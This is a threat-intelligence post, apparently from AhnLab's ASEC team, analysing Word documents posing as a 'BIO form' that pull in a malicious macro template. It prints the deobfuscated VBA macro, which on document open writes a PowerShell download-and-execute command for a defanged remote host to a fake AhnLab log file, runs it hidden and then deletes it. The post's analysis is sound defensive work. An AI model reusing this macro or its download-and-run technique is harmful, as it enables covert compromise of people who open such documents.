Since last month, the ASEC analysis team has been continuously uploading posts about APT attacks that use Word documents. Recently, it found that malware of the same type is being constantly distributed under the name ‘BIO form.’ Judging from the distribution history of the previous Word documents, we can assume that this file also targets professors or research center directors related to North Korea while disguising itself as a biography form.
The recently discovered file also runs a dotm file containing a malicious macro through an external link inside the Word file. The following shows the external link included in the ‘BIO Form (Mr. XX).docx‘ file that was found to be distributed on August 2nd.

The downloaded BIO.dotm file includes a malicious macro. The macro code is obfuscated in the same way as the previous one. Deobfuscating the macro reveals the code shown below.
Private Sub Document_Open()
    Set djfeihfidkasljf = CreateObject("Shell.Application")
    dfgdfjiejfjdshaj = "powershell.exe"
    dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"
    skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"
    ' Write the download command to Ahnlab.log
    Open Trim(dfjsdjailfksf) For Output As #2
    Print #2, skdjfksjkfjkdsfj
    Close #2
    ' Have PowerShell read and run the file that was just created
    dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"
    djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
    ' Wait 5 seconds, then delete the file
    Dim SngSec As Single
    SngSec = Timer + 5
    Do While Timer < SngSec
        DoEvents
    Loop
    Kill (dfjsdjailfksf)
End Sub
Previously, the macro ran a PowerShell command that downloaded files directly from a certain URL. This macro instead writes the download command to the ‘Ahnlab.log‘ file and then runs that created file through PowerShell.

The PowerShell command executed when the Word file is opened was changed as shown below.

The script hosted at hxxp://zenma.getenjoyment.net/ja/ng.txt, which is ultimately executed, performs the same function as in the previous cases.

As Word documents that exploit external links and target specific users are still being distributed, users need to take extra caution.
AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.
[File Detection]
- Downloader/XML.External
- Downloader/DOC.Agent